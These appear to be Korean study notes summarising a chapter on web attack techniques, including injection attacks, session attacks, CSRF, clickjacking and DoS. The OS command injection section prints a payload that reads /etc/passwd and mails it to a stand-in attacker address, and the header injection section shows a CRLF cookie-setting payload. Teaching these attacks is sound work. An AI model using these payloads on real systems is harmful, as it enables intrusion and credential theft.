제 11장. 웹 공격 기술

• 인터넷상에서 벌어지는 공격의 대부분은 웹 사이트를 노린 것이다
• 웹 사이트 공격에는 어떤 것이 있는지 그리고 어떤 영향을 미치는지에 대해서 알아보자.

 

웹 애플리케이션에 대한 공격 패턴

• 서버를 노리는 능동적 공격 (active attack)
  공격자가 직접 웹 애플리케이션에 액세스 해서 공격 코드를 보내는 타입의 공격
  서버 상의 리소스에 대해 직접 실행되기 때문에 공격자가 리소스에 액세스 할 필요가 있음
  ex) SQL 인젝션, OS 커맨드 인젝션
• 유저를 노리는 수동적 공격 (passive attack)
  함점을 이용해서 유저에게 공격 코드를 실행시키는 공격
  공격자가 직접 웹 애플리케이션에 액세스 해서 공격하지 않음
  ex) 크로스 사이트 스크립팅(XSS, cross-site scripting), 크로스 사이트 리퀘스트 포저리(CSRF, Cross Site Request Forgery)

 

 

📘 1. 출력 값의 이스케이프 미비로 인한 취약성

출력 값의 이스케이프가 미비할 경우 공격자가 보낸 공격 코드가 출력하는 대상에 피해를 입힐 수 있다

🔎 1. 크로스 사이트 스크립팅(XSS, Cross-Site Scripting)

• 취약성이 있는 웹 사이트를 방문한 사용자의 브라우저에서 부정한 HTML 태그나 JavaScript 등을 동작시키는 공격
• 공격자가 작성한 스크립트가 함정이 되고 유저의 브라우저 상에서 움직이는 수동적 공격
• 예시
  로그인 폼에 함정을 설치하여 유저 ID와 패스워드 등의 정보를 탈취할 수 있다
  스크립트를 추가하여 유저의 쿠키를 빼앗을 수 있다

🔎 2. SQL 인젝션 (SQL Injection)

• 웹 애플리케이션을 이용하고 있는 데이터베이스에 SQL을 부정하게 실행하는 공격
• 커다란 위협을 일으킬 수 있는 취약성으로 개인 정보나 기밀 정보 누설로 직결되기도 함
• 예시
  '--'를 SQL에 추가하여 이후의 구문을 주석으로 처리를 한다. 조건이 명확하게 걸리지 않은 SQL이 나가게 된다
  SQL 인젝션을 통하여 유저 정보나 결제 정보 등의 다른 테이블을 부정하고 열람하거나 변조할 수 있다

🔎 3. OS 커맨드 인젝션 (OS Command Injection)

• 웹 애플리케이션을 경유하여 OS 명령을 부정하게 실행하는 공격
• 쉘을 호출하는 함수가 있는 곳에서 발생할 가능성이 높다
• 예시

[기존] - 아래의 값을 메일 주소로 저장
; cat /etc/passwd | mail hack@example.com

[변경] - /etc/passwd 라는 Linux의 계정 정보가 포함된 파일이 hack@example.com으로 메일이 송신
| /user/sbin/sendmail ; cat /etc/passwd | mail hack@example.com

🔎 4. HTTP 헤더 인젝션 (HTTP Header Injection)

• 공격자가 응답 헤더 필드에 개행 문자 등을 삽입함으로써 임의의 응답 헤더 필드나 바디를 추가하는 수동적 공격
• 특히 바디를 추가하는 공격을 HTTP 응답 분할 공격 (HTTP Response Splitting Attack)이라고 부름

예를 들어, 클라이언트가 카테고리를 선택해서 요청을 보낸다고 하자

[기존 요청]
http://example.com/?cat=101
[기존 응답 헤더]
Location: http://example.com/?cat=101

[변경된 요청]
http://example.com/?cat=101%0D%0ASet-Cookie:+SID=123456789
[변경된 응답 헤더]
Location: http://example.com/?cat=101(%0D%0A : 개행문자)
Set-Cookie: SID=123456789

즉, 공격자가 지정한 임의의 쿠기가 세팅되는 상황이 발생한다

🔎 5. 메일 헤더 인젝션 (Mail Header Injection)

• 웹 애플리케이션의 메일 송신 기능에 공격자가 임의의 To 및 Subject 등의 메일 헤더를 부정하게 추가하는 공격
• 취약성이 있는 웹 사이트를 이용해서 스팸 메일이나 바이러스 메일 등을 임의의 주소에 송신할 수 있음

🔎 6. 디렉토리 접근 공격 (Directory Traversal)

• 비공개 디렉토리 파일에 대해서 부정하게 디렉토리 패스를 가로질러 액세스 하는 공격
• 패스 트래버설(Path Traversal)이라고도 부름
• 파일을 조작하는 처리에서 파일 이름을 외부에서 지정하여 임의의 파일이나 디렉토리에 액세스 하는 것

🔎 7. 리모트 파일 인클루션 (Remote File Inclusion)

• 스크립트의 일부를 다른 파일에서 읽어올 때 공격자가 지정한 외부 서버의 URL을 파일에서 읽게 함으로써 임의의 스크립트를 동작시키는 공격

 

 

📘 2. 웹 서버의 설정이나 설계 미비로 인한 취약성

웹 서버를 잘못 설정하거나 잘못 설계할 때 생긴 문제 등에 의해 발생하는 취약성

🔎 1. 강제 브라우징 (Forced Browsing)

• 웹 서버의 공개 디렉토리에 있는 파일 중에서 공개 의도가 없는 파일이 열람되게 되는 취약성
• 공개하고 싶지 않은 파일의 URL을 숨기는 보안 대책에 의존하고 있는 경우 해당 URL을 알게 되면 파일을 열람할 수 있음

🔎 2. 부적절한 에러 메시지 처리 (Error Handling Vulnerability)

• 공격자에게 유익한 정보가 웹 애플리케이션의 에러 메시지에 포함된다는 취약성
• 웹 애플리케이션에서는 유저가 보고 있는 화면에 상세한 에러 메시지를 표시할 필요는 없다
• 상세한 에러 메시지는 공격자가 공격을 하기 위한 힌트가 될 수 있음

🔎 3. 오픈 리다이렉트 (Open Redirect)

• 지정한 임의의 URL로 리다이렉트 하는 기능

 

 

📘 3. 세션 관리 미비로 인한 취약성

세션 관리는 유저의 상태를 관리하기 위한 기능이다
세션 관리 기능이 취약한 경우 유저 인증 상태를 빼앗겨 버리는 피해가 발생한다

🔎 1. 세션 하이재킹 (Session Hijacking)

• 공격자가 어떠한 방법으로 유저의 세션 ID를 입수해서 악용하는 것으로, 유저로 위장하는 공격
• 유저의 세션 ID를 입수한 공격자는 브라우저의 쿠키에 세션 ID를 세팅하고 웹 사이트 액세스하여 유저로 위장할 수 있음

🔎 2. 세션 픽세이션 (Session Fixation)

• 세션 하이잭킹이 인증된 유저의 세션 ID를 빼앗는 공격이라면, 세션 픽세이션은 공격자가 지정한 세션 ID를 유저에게 강제적으로 사용하게 하는 것
• 세션 고정 공격이라고도 불림

공격 방법

1. 공격자가 공격에 사용할 세션 ID를 준비함 (아직 서버에서 인증 전 상태)
2. 유저가 해당 세션 ID를 사용하게 하여 인증받도록 함 (서버에서 인증하는 것)
3. 공격자는 해당 세션 ID를 이용하여 웹 사이트에 인증 (인증된 세션 ID를 이용하는 것)

🔎 3. 크로스 사이트 리퀘스트 포저리 (CSRF, Cross-Site Request Forgeries)

• 인증된 유저가 의도하지 않는 개인 정보나 설정 정보 등을 공격자가 설치해 둔 함정에 의해 어떤 상태로 갱신하는 처리를 강제로 실행시키는 공격

 

 

📘 4. 기타

🔎 1. 패스워크 크래킹 (Password Cracking)

• 패스워드를 논리적으로 이끌어내서 인증을 돌파하는 공격

🔎 2. 클릭 재킹 (Clickjacking)

• 투명한 버튼이나 링크를 함정으로 사용할 웹 페이지에 심어 두고, 유저에게 링크를 클릭하게 함으로써 의도하지 않은 콘텐츠에 액세스 시키는 공격
• UI Redressing이라고도 불림

🔎 3. DoS 공격 (Denial of Service attack)

• 서비스 제공을 정지 상태로 만드는 공격
• 서비스 정지 공격 또는 서비스 거부 공격이라 불림
• 액세스를 집중시킴으로써 부하를 걸어 리소스를 다 소비하게 하여 사실상 서비스를 정지 상태로 만든다
• 취약성을 공격해 서비스를 정지시킨다

🔎 4. 백도어 (Backdoor)

• 제한된 기능을 정규 절차를 밟지 않고 이용하기 위해 설치된 뒷문
• 본래 정해진 제한을 초과한 기능을 이용하는 것